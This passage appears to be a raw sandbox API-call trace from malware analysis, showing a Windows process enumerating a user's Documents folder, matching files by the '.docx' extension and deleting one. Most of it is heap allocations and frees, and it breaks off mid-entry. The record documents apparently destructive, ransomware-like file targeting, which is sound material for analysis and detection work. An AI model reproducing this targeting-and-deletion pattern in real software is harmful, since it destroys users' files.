ftLastWriteTime.dwLowDateTime=0x9efa0a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 0x90ae18 [0168.754] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0-mfkgr.docx")) returned 1 [0168.758] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x9efa0a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 0 [0168.758] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.760] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0168.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.761] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0168.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.762] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0168.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.764] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.764] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.766] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0168.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.767] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 